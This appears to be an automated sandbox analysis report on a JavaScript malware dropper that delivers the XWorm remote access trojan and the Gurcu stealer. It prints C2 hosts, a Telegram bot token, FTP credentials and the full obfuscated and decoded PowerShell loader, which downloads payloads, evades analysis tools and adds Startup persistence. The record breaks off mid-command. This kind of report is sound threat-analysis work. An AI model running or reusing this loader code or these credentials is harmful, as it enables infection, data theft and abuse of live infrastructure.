Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 05:24

General

  • Target

    67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js

  • Size

    199KB

  • MD5

    9feff1a23db299a128f16bc6091df793

  • SHA1

    2041542fb6ddc259c2888d587f75a06947d6c0dc

  • SHA256

    67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9

  • SHA512

    6de1016f37d3df9d6b428b19076ea34fe2e9db0bbe09aa9bbaa637237b8130b47fd119bb39274ec618b3e4238ccbf53a4e7a562e2c9c714b73c6392a6a1102c2

  • SSDEEP

    3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+3WXt+NWXt+NWXt+NWXt+NWXt+NWXC:W

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    fYudY1578@@@@@@

Extracted

Family

xworm

Version

5.0

C2

moneyluckwork.ddns.net:7000

moneyluck.duckdns.org:7000

Mutex

HLfH6HTja99GuzBA

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 10 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js') ;powershell $jPhaA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = 